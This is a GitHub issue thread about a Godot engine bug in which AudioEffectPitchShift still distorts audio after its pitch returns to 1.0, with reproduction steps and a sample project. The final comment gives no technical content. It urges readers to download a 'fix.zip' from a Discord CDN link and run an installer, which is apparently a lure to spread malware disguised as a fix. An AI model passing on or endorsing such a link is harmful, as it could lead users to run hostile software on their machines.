### ISSUE TITLE
AudioEffectPitchShift has audible effect when pitch = 1

### ISSUE THREAD

**Issue by JUSTCAMH** [godotengine/godot#96510]
### Tested versions

- Reproducible in 4.3.stable

### System information

Godot v4.3.stable - Windows 10.0.19045 - GLES3 (Compatibility) - NVIDIA GeForce RTX 3070 (NVIDIA; 32.0.15.6094) - 11th Gen Intel(R) Core(TM) i7-11700K @ 3.60GHz (16 Threads)

### Issue description

The documentation for AudioEffectPitchShift claims that "1.0 is the default pitch and plays sounds unaffected", which matches expectations, however this is not the case. If you first set the pitch to something other than 1 then back to 1 via scripting, the sound will be noticeably distorted compared to how it initially was. When starting the effect at a pitch of 1 the audio is indeed unaffected, however changing it to something else then back to 1 continues to distort the sound.

In the video below, the pitch starts at a default 1.0, then I quickly press buttons to set the pitch to something else then back to 1.0, check the console to see the values. The sound is initially undistorted, but after changing its pitch to something else then back, there's an audible difference in the sound.

https://github.com/user-attachments/assets/a266e974-c495-442c-a940-2ba32eefca89

I was hoping to fade the pitch effect in and out as you open a menu, however this won't be possible without noticeable audio weirdness. I tried turning off the effect which works but has a noticeable snap to it as the effect instantly turns off.

### Steps to reproduce

- In the MRP below, you can press left / right arrows to set the pitch to 0.5 or 1.5. Pressing space returns the pitch to the default value of 1.0
- Enter play mode, listen to the sound
- Quickly press right arrow then space, the sound is noticeably not the same as how it started, despite the pitch being returned to the starting value of 1.0

### Minimal reproduction project (MRP)

[pitch-shift-bug.zip](https://github.com/user-attachments/files/16844151/pitch-shift-bug.zip)

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
